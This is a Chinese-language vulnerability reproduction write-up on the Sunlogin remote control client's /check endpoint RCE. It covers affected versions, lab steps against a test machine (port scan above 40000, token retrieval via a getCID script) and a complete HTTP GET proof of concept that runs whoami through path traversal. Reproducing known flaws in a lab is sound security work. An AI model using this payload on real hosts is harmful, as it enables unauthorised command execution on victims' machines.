【漏洞復現】Sunlogin RCE 向日葵遠端程式碼執行
阿新 • • 發佈:2022-03-01
一、介紹
向日葵遠端控制是一款面向企業和專業人員的遠端pc管理和控制的服務軟體。可以在任何有網路的情況下,輕鬆訪問並控制安裝了向日葵客戶端的遠端主機。同時還能實現遠端檔案傳輸、遠端視訊監控等功能,這不僅為使用者的使用帶來很多便捷,還能為其提供各類保障。
Sunlogin RCE 是漏洞發生在介面/check
處,當引數cmd的值以ping或者nslookup開頭時可以構造命令實現遠端命令執行利用,客戶端開啟客戶端會自動隨機開啟一個大於40000的埠號。
二、影響版本
客戶端版本:
- 11.1.1
- 10.3.0.27372
- 11.0.0.33162
三、漏洞復現
向日癸客戶端版本:11.0.0.33162
作業系統:win10
目標靶機IP地址:192.168.18.129
1、安裝向日葵客戶端,並執行
2、使用御劍高速掃描埠工具對靶機IP進行40000埠以上的掃描
通過curl驗證一下存在漏洞
使用getCID指令碼獲取一下token,放到poc的cookie中驗證
可以成功執行命令
使用指令碼可以自動獲取token並執行命令
附poc:
GET /check?cmd=ping../../../../../../../../../../../windows/system32/whoami HTTP/1.1 Host: 192.168.200.209:50915 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Connection: close Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Cookie: CID=ciiHpsOHS1UtC5ZfZMrA1gApw9htv8ph